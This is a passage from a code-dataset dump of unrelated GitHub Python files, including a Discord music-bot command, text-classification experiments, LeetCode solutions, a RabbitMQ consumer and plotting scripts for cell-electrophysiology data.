'\\t'.join(entries)","repo_name":"SpeechClub/ETEH","sub_path":"eteh/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"67"} +{"seq_id":"30348345037","text":"from typing import Union\r\n\r\nclass TreeLink:\r\n\r\n def __init__(self, child_list: dict, letter: Union[None, str]):\r\n self.child_list = child_list\r\n self.letter = letter\r\n\r\n\r\ndef add_element_to_tree(head: TreeLink, code: str, letter: str):\r\n\r\n if len(code) == 1:\r\n head.child_list[code[:1]] = TreeLink({}, letter)\r\n return\r\n elif code[:1] not in head.child_list:\r\n head.child_list[code[:1]] = 
TreeLink({}, None)\r\n\r\n add_element_to_tree(head.child_list[code[:1]], code[1:], letter)\r\n\r\n\r\ndef main():\r\n letter_count, _ = [int(i) for i in input().split(' ')]\r\n\r\n code_tree_head = TreeLink({}, None)\r\n\r\n for _ in range(0, letter_count):\r\n letter, code = input().replace(':', '').split()\r\n\r\n add_element_to_tree(code_tree_head, code, letter)\r\n\r\n result_string = input()\r\n\r\n head = code_tree_head\r\n\r\n for item in result_string:\r\n\r\n if item in head.child_list:\r\n head = head.child_list[item]\r\n else:\r\n head = code_tree_head.child_list[item]\r\n\r\n if head.letter:\r\n print(head.letter, end='')\r\n\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"TopGitUser/Hello-world","sub_path":"HF2.py","file_name":"HF2.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28717564682","text":"import discord\r\nimport lavalink\r\nfrom discord.ext import commands\r\n\r\n\r\nclass Resume(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n \r\n @commands.command(name='resume', description='?rs, ?RS', aliases=['rs', 'RS'])\r\n async def resume(self, ctx):\r\n voice_state = ctx.author.voice\r\n player = self.bot.lavalink.player_manager.get(ctx.guild.id)\r\n if not voice_state or not voice_state.channel:\r\n return await ctx.send('You need to be in a voice channel to use this command.')\r\n\r\n if not player:\r\n return await ctx.send('There is no player for this guild.')\r\n\r\n if not player.paused:\r\n return await ctx.send('The player is not paused.')\r\n\r\n await player.set_pause(False)\r\n embed = discord.Embed(\r\n title=f'Resumed',\r\n description=\"▶️ Resumed the player\",\r\n color=discord.Color.dark_blue(),\r\n timestamp=ctx.message.created_at\r\n )\r\n embed.set_author(\r\n name=self.bot.user.name,\r\n icon_url=self.bot.user.display_avatar.url\r\n )\r\n await ctx.send(embed=embed)\r\n \r\n \r\nasync def setup(bot):\r\n await bot.add_cog(Resume(bot))","repo_name":"NNKTV28/Discord-Music-bot","sub_path":"cogs/resume.py","file_name":"resume.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36910981878","text":"import re\nimport os\nimport random\nimport tarfile\nimport urllib\nfrom torchtext import data\nimport jieba\n\n\ndef tokenizer(x):\n res = [w for w in jieba.cut(x)]\n return res\n\n\ndef load_dataset(args):\n stop_words = []\n print('build stop words set')\n with open('dataset/stopwords.dat', encoding='UTF-8') as f:\n for l in f.readlines():\n stop_words.append(l.strip())\n\n TEXT = data.Field(sequential=True, tokenize=tokenizer, fix_length=1000, stop_words=stop_words)\n LABEL = data.Field(sequential=False, use_vocab=False)\n #\n train, valid, test = data.TabularDataset.splits(path='dataset', train='train.csv',\n validation='valid.csv', test='test.csv',\n format='csv',\n skip_header=True, csv_reader_params={'delimiter': ','},\n fields=[(None, None), ('class_label', LABEL), ('content', TEXT)])\n TEXT.build_vocab(train)\n\n train_iter, val_iter, test_iter = data.Iterator.splits((train, valid, test),\n batch_sizes=(\n args.batch_size, args.batch_size, args.batch_size),\n device=args.device,\n sort_key=lambda x: len(x.content),\n sort_within_batch=False,\n repeat=False)\n return TEXT, LABEL, train_iter, val_iter, 
test_iter\n","repo_name":"Xilixili/CCF-data-competetion","sub_path":"TextCNN/mydatasets.py","file_name":"mydatasets.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33530028480","text":"#!/usr/bin/python\n\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.pipeline import Pipeline\nfrom nltk.corpus import stopwords \nfrom nltk.tokenize import word_tokenize \n\nimport os\nimport pickle\nimport re\nimport sys\nimport numpy as np\n\nsys.path.append( \"C:\\\\Users\\\\pniksirat\\\\Downloads\\\\ud120-projects-master\\\\ud120-projects-master\\\\tools\" )\nfrom parse_out_email_text import parseOutText\n\n\"\"\"\n Starter code to process the emails from Sara and Chris to extract\n the features and get the documents ready for classification.\n\n The list of all the emails from Sara are in the from_sara list\n likewise for emails from Chris (from_chris)\n\n The actual documents are in the Enron email dataset, which\n you downloaded/unpacked in Part 0 of the first mini-project. If you have\n not obtained the Enron email corpus, run startup.py in the tools folder.\n\n The data is stored in lists and packed away in pickle files at the end.\n\"\"\"\ndir=os.path.join(os.path.abspath(os.curdir),\"text_learning\")\nos.chdir(dir)\nfrom_sara = open(\"from_sara.txt\", \"r\")\nfrom_chris = open(\"from_chris.txt\", \"r\")\nos.chdir(\"..\")\n\nfrom_data = []\nword_data = []\n\n### temp_counter is a way to speed up the development--there are\n### thousands of emails from Sara and Chris, so running over all of them\n### can take a long time\n### temp_counter helps you only look at the first 200 emails in the list so you\n### can iterate your modifications quicker\ntemp_counter = 0\n\n\nfor name, from_person in [(\"sara\", from_sara), (\"chris\", from_chris)]:\n for path in from_person:\n ### only look at first 200 emails when developing\n ### once everything is working, remove this line to run over full dataset\n temp_counter += 1\n # if temp_counter < 200:\n path = os.path.join('..', path[:-1])\n print(path)\n email = open(path, \"r\")\n\n ### use parseOutText to extract the text from the opened email\n text = parseOutText(email)\n ### use str.replace() to remove any instances of the words\n ### [\"sara\", \"shackleton\", \"chris\", \"germani\"]\n sig=[\"sara\", \"shackleton\", \"chris\", \"germani\"]\n text_mod=text\n for key in sig: \n text_mod = text_mod.replace( key, \"\" )\n ### append the text to word_data\n word_data.append(text_mod)\n ### append a 0 to from_data if email is from Sara, and 1 if email is from Chris\n if name==\"sara\":\n from_data.append(0)\n else :\n from_data.append(1)\n\n email.close()\n\nprint(\"emails processed\")\nfrom_sara.close()\nfrom_chris.close()\n\npickle.dump( word_data, open(\"your_word_data.pkl\", \"wb\") )\npickle.dump( from_data, open(\"your_email_authors.pkl\", \"wb\") )\n\n\n\n\n\n### in Part 4, do TfIdf vectorization here\n\n#removing stop words\nfiltered_sentence=[]\nfiltered_temp=[]\nfiltered=[]\nstop_words = set(stopwords.words('english')) \nword_tokens = [word_tokenize(x) for x in word_data] \nfor i in range(len(word_data)):\n filtered_sentence.append([w for w in word_tokens[i] if not w in stop_words])\nfor i in range(len(word_data)): \n for w in word_tokens[i]: \n if w not in stop_words: \n filtered_temp.append(w)\n 
filtered.append(np.array(filtered_temp))\n filtered_temp=[]\n\nfiltered_Str=[]\nfor i in range(len(filtered)):\n filtered_Str.append((''.join(filtered[i])))\n\npipe = Pipeline([('vect', CountVectorizer()),('tfid', TfidfTransformer())]).fit(filtered_Str)\npipe['vect'].transform(filtered_Str).toarray()\n\npipe['tfid'].idf_\n\npipe.transform(filtered_Str).shape \n\nvectorizer = TfidfVectorizer()\nX = vectorizer.fit_transform(filtered_Str)\nprint(vectorizer.get_feature_names())\n\nprint(X.shape)\n","repo_name":"pniksirat/ML_","sub_path":"text_learning/vectorize_text.py","file_name":"vectorize_text.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29345044843","text":"from typing import List\n\n\nclass Solution:\n def mostCompetitiveFactorial(self, nums: List[int], k: int) -> List[int]:\n res = []\n start = 0\n N = len(nums)\n for i in range(k):\n sml = min(nums[start:N + i - k + 1])\n start = nums.index(sml, start, N + i - k + 1) + 1\n res.append(sml)\n return res\n\n def mostCompetitive(self, nums: List[int], k: int) -> List[int]:\n attempts = len(nums) - k\n stack = []\n for num in nums:\n while stack and nums < stack[-1] and attempts > 0:\n stack.pop()\n attempts -= 1\n stack.append(num)\n return stack[:k]\n\n\nif __name__ == '__main__':\n nums = [2, 4, 3, 3, 5, 4, 9, 6]\n k = 4\n print((Solution().mostCompetitive(nums, k)))\n","repo_name":"replcloud/interview_py","sub_path":"us/matthey/coco/algorithm/leetcode/find_the_most_competitive_subsequence.py","file_name":"find_the_most_competitive_subsequence.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"21123560318","text":"class Solution:\n def numSimilarGroups(self, strs: List[str]) -> int:\n class UnionFind:\n def __init__(self, n):\n self.parent = list(range(n))\n self.rank = [0 for _ in range(n)]\n\n def find(self, x):\n while x != self.parent[x]:\n x = self.parent[x]\n return x\n\n def union(self, x, y):\n root1 = self.find(x)\n root2 = self.find(y)\n if root1 == root2:\n return\n if self.rank[root1] > self.rank[root2]:\n self.parent[root2] = root1\n else:\n self.parent[root1] = root2\n if self.rank[root1] == self.rank[root2]:\n self.rank[root2] += 1\n\n n = len(strs)\n uf = UnionFind(n)\n for i in range(n):\n for j in range(i + 1, n):\n if sum(strs[i][k] != strs[j][k] for k in range(len(strs[i]))) in (0, 2):\n uf.union(i, j)\n return len(set(uf.find(i) for i in range(n)))\n\n","repo_name":"fxrcode/FG","sub_path":"0839-similar-string-groups/0839-similar-string-groups.py","file_name":"0839-similar-string-groups.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"5123878647","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nfrom os import listdir\nfrom scipy.signal import find_peaks\nimport matplotlib\nfrom seaborn import histplot\nimport numpy as np\n\nimport myokit\n\nfrom utility import VCSegment, VCProtocol\n\n\nplt.rcParams['lines.linewidth'] = .9\nplt.rcParams['lines.markersize'] = 4\nplt.rcParams['xtick.labelsize'] = 8\nplt.rcParams['ytick.labelsize'] = 8\nplt.rcParams['axes.labelsize'] = 10 \nplt.rcParams['axes.labelsize'] = 10 \nplt.rc('legend', fontsize = 8)\n\n\ndef plot_figure_gin_change():\n fig = plt.figure(figsize=(6.5, 2.75))\n fig.subplots_adjust(.07, .2, .95, .95)\n\n grid = fig.add_gridspec(1, 2, 
hspace=.2, wspace=0.3)\n\n #panel 1\n plot_gin_hist(fig, grid[0])\n print('one')\n\n #panel 2\n plot_gin_vs_t(fig, grid[1])\n print('two')\n\n plt.savefig('./figure-pdfs/f4.pdf')\n plt.show()\n\n\ndef plot_gin_hist(fig, grid_box):\n subgrid = grid_box.subgridspec(1, 1, wspace=.9, hspace=.1)\n ax = fig.add_subplot(subgrid[0]) \n ax.set_title('A', y=.94, x=-.15)\n\n all_cells = listdir('./data/cells')\n\n all_gin = []\n all_gin2 = []\n all_rin = []\n\n for cell in all_cells:\n if 'DS_Store' in cell:\n continue\n\n cell_params = pd.read_excel(f'./data/cells/{cell}/cell-params.xlsx')\n rm = cell_params['Rm'].values[0]\n\n all_gin.append(1/rm*1000)\n all_gin2.append(1/cell_params['Rm'].values[1]*1000)\n all_rin.append(rm/1000)\n\n #histplot(all_gin, ax=ax, bins=12, color='k', alpha=.5, binwidth=.5)\n #hist, bins = np.histogram(all_rin, bins=8)\n #logbins = np.logspace(np.log10(bins[0]),np.log10(bins[-1]),len(bins))\n #ax.hist(all_rin, bins=logbins)\n histplot(all_rin, ax=ax, bins=8, color='k', alpha=.5,\n log_scale=True)\n #ax.hist(all_rin, bins=logbins, color='k', alpha=.5, binwidth=.5)\n #ax.set_xscale('log')\n\n #ax.set_xlabel(r'$g_{in} (nS)$')\n ax.set_xlabel(r'$R_{in} (G\\Omega)$')\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n labs = [1]\n labs += [None for i in range(2, 10)]\n labs += [10]\n\n #ax.set_xticks([0, 1, 10], labels=['0', '1', '10'])\n\n print(f'Mean: {np.mean(all_rin)}')\n print(f'Median: {np.median(all_rin)}')\n print(f'Std: {np.std(all_rin)}')\n print(f'Min: {np.min(all_rin)}')\n print(f'Max: {np.max(all_rin)}')\n\n\ndef plot_gin_vs_t(fig, grid_box):\n subgrid = grid_box.subgridspec(4, 1, wspace=.9, hspace=.1, )\n ax_out = fig.add_subplot(subgrid[0]) \n ax = fig.add_subplot(subgrid[1:]) \n ax_out.set_title('B', y=.7, x=-.2)\n\n all_cells = listdir('./data/cells')\n\n delta_gin = []\n delta_t = []\n\n j = 0\n\n for i, cell in enumerate(all_cells):\n if 'DS_Store' in cell:\n continue\n\n #print(f'Cell {j}')\n j = j + 1\n\n cell_params = pd.read_excel(f'./data/cells/{cell}/cell-params.xlsx')\n rm_spont = cell_params['Rm'].values[0]\n rm_vc = cell_params['Rm'].values[1]\n\n st = cell_params['param_time'].values[0].minute\n end = cell_params['param_time'].values[1].minute\n\n minute_diff = end - st\n\n #if minute_diff == 0:\n # import pdb\n # pdb.set_trace()\n # continue\n\n if minute_diff < 0:\n minute_diff = 60 - st + end\n\n gin_change = (rm_vc - rm_spont) / (rm_spont)\n\n if gin_change > 6:\n max_gin_change = gin_change\n max_gin_t = minute_diff \n\n delta_gin.append(gin_change)\n delta_t.append(minute_diff)\n\n ax.scatter(delta_t, 100*np.array(delta_gin), color='k', marker='o')\n\n ax_out.scatter(max_gin_t, 100*max_gin_change, color='k', marker='o')\n ax_out.spines['right'].set_visible(False)\n ax_out.spines['bottom'].set_visible(False)\n ax_out.spines['top'].set_visible(False)\n ax_out.set_xticklabels([])\n ax_out.set_xticks([])\n ax_out.set_ylim(1150, 1350)\n\n ax.set_ylim(-120, 380)\n\n d = .03\n kwargs = dict(transform=ax.transAxes, color='k', clip_on=False)\n ax.plot((-d, +d), (1 - d, 1 + d), **kwargs)\n\n kwargs = dict(transform=ax.transAxes, color='k', clip_on=False)\n ax_out.plot((-d, +d), (1.03 - d, 1.03 + d), **kwargs)\n\n #ax.yaxis.set_label_coords(.7, -.12)\n\n\n ax.set_xlabel(r'$\\Delta Time$ (min)')\n ax.set_ylabel(r'$R_{in}$ Change (%)')\n\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n\n print(f'Average time change: {np.mean(delta_gin)}')\n print(f'Median time change: {np.median(delta_gin)}')\n 
print(f'Std time change: {np.std(delta_gin)}')\n print(f'Includes {len(delta_gin)} Cells')\n\n print(f'Abs Average time change: {np.mean(np.abs(delta_gin))}')\n print(f'Median time change: {np.median(np.abs(delta_gin))}')\n print(f'Std time change: {np.std(np.abs(delta_gin))}')\n print(f'Includes {len(delta_gin)} Cells')\n\n\ndef main():\n plot_figure_gin_change()\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Christini-Lab/iPSC-leak-artifact","sub_path":"f4-leak-changes.py","file_name":"f4-leak-changes.py","file_ext":"py","file_size_in_byte":4954,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"30911294726","text":"from argparse import ArgumentParser\n\nimport pika\n\n\ndef consume_message(channel, method, header, body):\n channel.basic_ack(method.delivery_tag)\n print(body)\n\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument('--host')\n args = parser.parse_args()\n\n host = args.host\n\n credentials = pika.PlainCredentials(\"user\", \"user\")\n conn_params = pika.ConnectionParameters(host, credentials=credentials)\n conn_broker = pika.BlockingConnection(conn_params)\n\n channel = conn_broker.channel()\n channel.exchange_declare(exchange=\"rabbit_task\", exchange_type=\"topic\",\n passive=False, durable=True, auto_delete=False)\n channel.queue_declare(queue=\"some_queue\")\n channel.queue_bind(queue=\"some_queue\", exchange=\"rabbit_task\", routing_key=\"rabbit\")\n channel.basic_consume(queue=\"some_queue\", consumer_tag=\"consumer_tag\", on_message_callback=consume_message)\n channel.start_consuming()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Andoree/bigdata_course","sub_path":"lab_6/consume.py","file_name":"consume.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7658116963","text":"# Copy-pasted from #2\n# Build it deep with a CNN\n# Build two models: one is a basic autoencoder\n# the other is a deep configuration\n# Compare the performance of the two\n\n'''\nConv2D\nMaxPool\nConv2D\nMaxPool\nConv2D -> encoder\n\nConv2D\nUpSampling2D\nConv2D\nUpSampling2D\nConv2D\nUpSampling2D\nConv2D(1,) -> Decoder\n'''\n\nimport numpy as np\nfrom tensorflow.keras.datasets import mnist\n\n\n(x_train, _), (x_test, _) = mnist.load_data()\n\nx_train = x_train.reshape(60000, 28, 28, 1).astype('float')/255\nx_test = x_test.reshape(10000, 28, 28, 1).astype('float')/255\n\nprint(x_train.shape, x_test.shape) # (60000, 28, 28, 1) (10000, 28, 28, 1)\n\nfrom tensorflow.keras.models import Model, Sequential\nfrom tensorflow.keras.layers import Dense, Input, Conv2D, UpSampling2D\n\ndef autoencoder(hidden_layer_size):\n model = Sequential()\n model.add(Conv2D(hidden_layer_size, (2, 2), activation='relu', input_shape=(28, 28, 1)))\n model.add(UpSampling2D((2, 2)))\n model.add(Conv2D(hidden_layer_size // 2, (2, 2), activation='relu'))\n model.add(UpSampling2D((2, 2)))\n model.add(Dense(units=784, activation='sigmoid'))\n return model\n","repo_name":"seolhyeonyang/tensorflow","sub_path":"AE/a05_CAE.py","file_name":"a05_CAE.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72698227092","text":"num = 1\nitems = []\n\n\ndef add_item(itemName, itemCost):\n items.append(f\"{itemName} - {itemCost}\")\n \n \ndef print_receipt():\n global num, items\n \n if not items:\n return\n \n print(f\"Чек {num}. 
Всего предметов: {len(items)}\")\n print(*items, sep='\\n')\n print(f\"Итого: {sum([int(i.split(' - ')[1]) for i in items])}\")\n print('-' * 5)\n \n num += 1\n items = []\n \n ","repo_name":"RIMPOFUNK/FirstLyceumCourse","sub_path":"Lesson 21 (Области видимости)/Classwork/4. Длинный чек.py","file_name":"4. Длинный чек.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4087300740","text":"#!/usr/bin/python3\n\nimport sys\nimport os\n\nfrom numpy.lib.arraysetops import isin\n\nsys.path.append(\"..\")\n\nfrom config.data_types import *\nfrom config.register_name import register_name\n\n\nclass ModuleBase:\n def __init__(self) -> None:\n self.input_port = None\n self.output_port = None\n self.ports = {\n \"input\": {},\n \"output\": {},\n }\n\n\n# StateMachine\nclass Module(ModuleBase):\n # Transporting data through ports and tick the clock\n def tick(self, data):\n self.input_port = data\n if self.output_port is not None:\n # TODO: re-impl as pop()\n tmp = self.output_port\n self.output_port = None\n return tmp\n else:\n return None\n\n # Execute internal logic\n def step(self):\n if self.input_port is not None:\n # TODO: re-impl as push()\n self.output_port = self.op(self.input_port)\n self.input_port = None\n else:\n pass\n\n def op(self, data):\n pass\n\n def flush(self):\n self.input_port = None\n self.output_port = None\n for port_type in self.ports:\n for port in self.ports[port_type]:\n self.ports[port_type][port].data = None\n self.ports[port_type][port].update_status()\n\n\nclass Port:\n def __init__(self, name) -> None:\n self.name = name\n self.data = None\n self.valid = self.data is not None\n self.ready = self.data is None\n\n def update_status(self):\n self.valid = self.data is not None\n self.ready = self.data is None\n\n if os.environ.get(\"DEBUG_PRINT\") is not None:\n self.print()\n\n def print(self):\n print(\"{}: [valid:{} ready:{}]\".format(self.name, self.valid, self.ready))\n self.print_data(self.data)\n\n def print_data(self, data):\n if data is None:\n return\n\n # EX output data, multi-field\n # TODO: Trap info\n if isinstance(data, dict):\n if \"results\" in data:\n for issue_queue_data in data[\"results\"]:\n for item in issue_queue_data:\n print(\" [\")\n for k, v in item.items():\n if isinstance(v, word_type) or isinstance(v, double_type):\n print(\" {}: {:08x}\".format(k, v))\n else:\n print(\" {}: {}\".format(k, str(v)))\n print(\" ]\")\n else:\n print(\" [\")\n for k, v in data.items():\n if isinstance(v, word_type) or isinstance(v, double_type):\n print(\" {}: {:08x}\".format(k, v))\n else:\n print(\" {}: {}\".format(k, str(v)))\n print(\" ]\")\n\n elif isinstance(data, list):\n if isinstance(data[0], dict):\n for item in data:\n print(\" [\")\n for k, v in item.items():\n if isinstance(v, word_type) or isinstance(v, double_type):\n print(\" {}: {:08x}\".format(k, v))\n else:\n print(\" {}: {}\".format(k, str(v)))\n print(\" ]\")\n elif isinstance(data[0], list):\n for issue_queue_index, issue_queue_data in enumerate(data):\n print(\"Issue queue[{}]\".format(issue_queue_index))\n for item in issue_queue_data:\n print(\" [\")\n for k, v in item.items():\n if isinstance(v, word_type) or isinstance(v, double_type):\n print(\" {}: {:08x}\".format(k, v))\n else:\n print(\" {}: {}\".format(k, str(v)))\n print(\" 
]\")\n","repo_name":"chaoRIOS/model","sub_path":"pipeline/module_base.py","file_name":"module_base.py","file_ext":"py","file_size_in_byte":3982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33040120369","text":"#!/usr/bin/python3\n\"\"\" Module to solve the rain challenge\n\"\"\"\n\n\ndef rain(walls):\n \"\"\"Return the number of units of rainwater retained between the walls\n \"\"\"\n res = 0\n for i in range(1, len(walls) - 1):\n left = walls[i]\n for j in range(i):\n left = max(left, walls[j])\n\n right = walls[i]\n for j in range(i + 1, len(walls)):\n right = max(right, walls[j])\n\n res = res + (min(left, right) - walls[i])\n\n return res\n","repo_name":"Jfprado11/holbertonschool-interview","sub_path":"0x10-rain/0-rain.py","file_name":"0-rain.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31094327703","text":"# coding: utf-8\n\n\"\"\"\n Stadia Maps Geospatial APIs\n\n The Stadia Maps Geospatial APIs provide you with the data you need to build awesome applications. # noqa: E501\n\n The version of the OpenAPI document: 5.0.6\n Contact: support@stadiamaps.com\n Generated by OpenAPI Generator (https://openapi-generator.tech)\n\n Do not edit the class manually.\n\"\"\"\n\n\nfrom __future__ import annotations\n\nimport json\nimport pprint\nimport re # noqa: F401\nfrom aenum import Enum, no_arg\n\n\n\n\n\nclass NodeType(str, Enum):\n \"\"\"\n NodeType\n \"\"\"\n\n \"\"\"\n allowed enum values\n \"\"\"\n STREET_INTERSECTION = 'street_intersection'\n GATE = 'gate'\n BOLLARD = 'bollard'\n TOLL_BOOTH = 'toll_booth'\n MULTI_USE_TRANSIT_STOP = 'multi_use_transit_stop'\n BIKE_SHARE = 'bike_share'\n PARKING = 'parking'\n MOTOR_WAY_JUNCTION = 'motor_way_junction'\n BORDER_CONTROL = 'border_control'\n\n @classmethod\n def from_json(cls, json_str: str) -> NodeType:\n \"\"\"Create an instance of NodeType from a JSON string\"\"\"\n return NodeType(json.loads(json_str))\n\n\n","repo_name":"stadiamaps/stadiamaps-api-py","sub_path":"stadiamaps/models/node_type.py","file_name":"node_type.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"9587756113","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# Importing Libraries\nimport pandas as pd\nfrom sklearn.naive_bayes import MultinomialNB, ComplementNB\n\n# Importing custom utility functions\nfrom utilities.data_loader import load_modeling_data, load_testing_data, prepare_kaggle_submission\nfrom utilities.text_cleaner import advanced_data_cleaning\n\n# Importing modeling utilities\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.preprocessing import LabelEncoder\nfrom skopt import BayesSearchCV\nfrom sklearn.metrics import accuracy_score, classification_report, confusion_matrix\nimport re\nimport nltk\nimport joblib\nfrom nltk.stem import PorterStemmer\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.corpus import stopwords\nstop_words = stopwords.words('english')\n\n\n# In[2]:\n\n\n# Loading Raw training and testing data\ntrain_data, train_labels = load_modeling_data()\ntest_data = load_testing_data()\n\n\n# In[3]:\n\n\nle = LabelEncoder()\ntrain_labels['target'] = le.fit_transform(train_labels['target'].values)\n\n\n# In[4]:\n\n\n# Splitting data for validation\n# Using 20% data for validation and keeping random_state 8 for consistency in stated results 
in report.\nX_train, X_val, y_train, y_val = train_test_split(train_data, train_labels, test_size=0.2, random_state = 8)\n\n\n# # Experiment 1: Making Baseline\n\n# In[5]:\n\n\n# Initializing Bag of Words instance (CountVectorizer)\nprint('-'*175+'Baseline Naive Bayes'+'-'*175)\nbow = CountVectorizer()\n\n\n# In[6]:\n\n\n# Fitting and training the bag of words\nX_train_bow = bow.fit_transform(X_train['text'])\nX_val_bow = bow.transform(X_val['text'])\n\n\n# In[7]:\n\n\nprint(\"shape of the bag of words matrix: \",X_train_bow.shape)\n\n\n# In[8]:\n\n\n# Initializing naive bayes classifier\nnb_clf_1 = MultinomialNB()\n\n\n# In[9]:\n\n\n# Training the classifier with default parameters\nnb_clf_1.fit(X_train_bow, y_train['target'].values)\n\n\n# In[10]:\n\n\n# Predicting from the validation set\ny_pred_val = nb_clf_1.predict(X_val_bow)\n\n\n# In[11]:\n\n\n# Printing the results\nprint('Accuracy score: ', accuracy_score(y_val['target'].values, y_pred_val))\nprint('Confusion Matrix: ')\nprint(confusion_matrix(y_val['target'].values, y_pred_val))\nprint('Classification Report: ')\nprint(classification_report(y_val['target'].values, y_pred_val))\n\n\n# In[ ]:\n\n\n\n\n\n# # Experiment 2: Hyperparameter Tuning\n\n# In[12]:\n\n\nprint('-'*175+'Naive Bayes Hyper parameter tuning'+'-'*175)\n\n\n# In[13]:\n\n\n# defining search grid\ngrid = {\n 'alpha': [0, 0.25, 1, 2, 3, 5, 10]\n}\n\n\n# In[14]:\n\n\n# Initializing Bayesian search\nnb_clf_2 = BayesSearchCV(MultinomialNB(), grid, n_iter=7)\n\n\n# In[15]:\n\n\n# Training for best hyperparameters\n_ = nb_clf_2.fit(X_train_bow, y_train['target'].values)\n\n\n# In[16]:\n\n\n# printing the best found parameters\nprint(\"Best found hyperparameters are: \")\nprint(nb_clf_2.best_params_)\n\n\n# In[17]:\n\n\nnb_clf_2 = MultinomialNB(alpha=2.0)\nnb_clf_2.fit(X_train_bow, y_train['target'].values)\ny_val_pred = nb_clf_2.predict(X_val_bow)\n\n\n# In[18]:\n\n\n# Printing the results\nprint('Accuracy score: ', accuracy_score(y_val['target'].values, y_val_pred))\nprint('Confusion Matrix: ')\nprint(confusion_matrix(y_val['target'].values, y_val_pred))\nprint('Classification Report: ')\nprint(classification_report(y_val['target'].values, y_val_pred))\n\n\n# In[ ]:\n\n\n\n\n\n# # Experiment 3: Stemming\n\n# In[19]:\n\n\nprint('-'*175+'Naive Bayes with stemming'+'-'*175)\n\n\n# In[20]:\n\n\n# defining stemming function\ndef stemmer(text):\n porter = PorterStemmer()\n ls = [porter.stem(word) for word in text.split()]\n return ' '.join(ls)\n\n\n# In[21]:\n\n\n# making copy of dataframe and applying stemming to each text documents\nX_train_stem = X_train.copy()\nX_val_stem = X_val.copy()\nX_train_stem['text'] = X_train_stem['text'].apply(stemmer)\nX_val_stem['text'] = X_val_stem['text'].apply(stemmer)\n\n\n# In[22]:\n\n\nbow = CountVectorizer()\nX_train_bow = bow.fit_transform(X_train_stem['text'])\nX_val_bow = bow.transform(X_val_stem['text'])\n\n\n# In[23]:\n\n\nnb_clf_3 = MultinomialNB(alpha=2.0)\nnb_clf_3.fit(X_train_bow, y_train['target'].values)\ny_val_pred = nb_clf_3.predict(X_val_bow)\n\n\n# In[24]:\n\n\n# Printing the results\nprint('Accuracy score: ', accuracy_score(y_val['target'].values, y_val_pred))\nprint('Confusion Matrix: ')\nprint(confusion_matrix(y_val['target'].values, y_val_pred))\nprint('Classification Report: ')\nprint(classification_report(y_val['target'].values, y_val_pred))\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# # Experiment 4: Lemmatizing\n\n# In[25]:\n\n\nprint('-'*175+'Naive Bayes with lemmatizing'+'-'*175)\n\n\n# In[26]:\n\n\n# 
defining lemmatizing function\ndef lemmatizer(text):\n wordnet = WordNetLemmatizer()\n ls = [wordnet.lemmatize(word) for word in text.split()]\n return ' '.join(ls)\n\n\n# In[27]:\n\n\n# making copy of dataframe and applying lemmatizing to each text documents\nX_train_lemmatize = X_train.copy()\nX_val_lemmatize = X_val.copy()\nX_train_lemmatize['text'] = X_train_lemmatize['text'].apply(lemmatizer)\nX_val_lemmatize['text'] = X_val_lemmatize['text'].apply(lemmatizer)\n\n\n# In[28]:\n\n\nbow = CountVectorizer()\nX_train_bow = bow.fit_transform(X_train_lemmatize['text'])\nX_val_bow = bow.transform(X_val_lemmatize['text'])\n\n\n# In[29]:\n\n\nnb_clf_4 = MultinomialNB(alpha=2.0)\nnb_clf_4.fit(X_train_bow, y_train['target'].values)\ny_val_pred = nb_clf_4.predict(X_val_bow)\n\n\n# In[30]:\n\n\n# Printing the results\nprint('Accuracy score: ', accuracy_score(y_val['target'].values, y_val_pred))\nprint('Confusion Matrix: ')\nprint(confusion_matrix(y_val['target'].values, y_val_pred))\nprint('Classification Report: ')\nprint(classification_report(y_val['target'].values, y_val_pred))\n\n\n# In[ ]:\n\n\n\n\n\n# # Experiment 5: Removing 